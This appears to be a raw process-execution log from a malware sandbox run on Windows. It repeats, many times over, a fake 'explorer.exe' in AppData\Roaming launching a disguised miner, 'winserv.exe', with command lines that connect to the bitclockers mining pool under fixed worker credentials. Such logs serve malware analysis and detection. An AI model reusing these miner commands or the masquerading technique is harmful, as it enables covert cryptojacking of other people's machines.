C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
